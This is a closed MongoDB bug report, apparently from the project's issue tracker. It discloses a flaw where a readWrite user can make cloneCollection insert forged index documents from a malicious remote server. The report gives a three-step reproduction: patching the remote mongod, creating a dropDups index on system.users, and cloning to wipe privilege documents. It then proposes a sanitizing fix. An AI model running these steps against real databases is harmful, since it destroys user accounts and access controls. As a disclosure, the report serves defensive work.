Uploaded image for project: 'Core Server'
  1. Core Server
  2. SERVER-8942

readWrite users can delete privilege documents via cloneCollection

    XMLWordPrintable

    Details

    • Type: Bug
    • Status: Closed
    • Priority: Major - P3
    • Resolution: Fixed
    • Affects Version/s: 2.4.0-rc2
    • Fix Version/s: 2.5.3
    • Component/s: Security
    • Labels:
      None
    • Operating System:
      ALL

      Description

      Running the command {cloneCollection:ns} creates indexes on ns, inserting one document for each result returned from the remote query db.system.indexes.find({ns:ns}). However, no input sanitization is performed to ensure that the returned index documents actually conform to the requested filter. A readWrite attacker can exploit this by instructing a remote machine to return false results, in order to create arbitrary indexes of his/her choosing on the target database. The attacker can combine this with the secondary weakness described in SERVER-8802 (creating a dropDups system.users index) to delete privilege documents.

      The proposed fix is to sanitize the result of db.system.indexes.find({ns:ns}) query, to ensure that doc.ns == ns for each item in the result set.

      Reproduce via:

      1. Instrument remote malicious mongod to replace every incoming query filter with {name: "exploit_1"}.

      perl -pi -e 's/^(        QueryMessage q\(d\);)$/\1 q.query = BSON\("name" << "exploit_1"\);/' src/mongo/db/instance.cpp
      scons mongod
      ./mongod

      2. Create index on remote malicious mongod

      db.system.users.ensureIndex({exploit:1}, {name:"exploit_1", unique:true, dropDups:true})

      3. Run cloneCollection on victim mongod; victim mongod blindly inserts above index document and consequently drops N-1 privilege documents from test

      db.adminCommand({cloneCollection:"test.collection", from:"malicious:27017"}

        Attachments

          Issue Links

            Activity

              People

              Assignee:
              schwerin Andy Schwerin
              Reporter:
              rassi J Rassi
              Participants:
              Votes:
              0 Vote for this issue
              Watchers:
              4 Start watching this issue

                Dates

                Created:
                Updated:
                Resolved: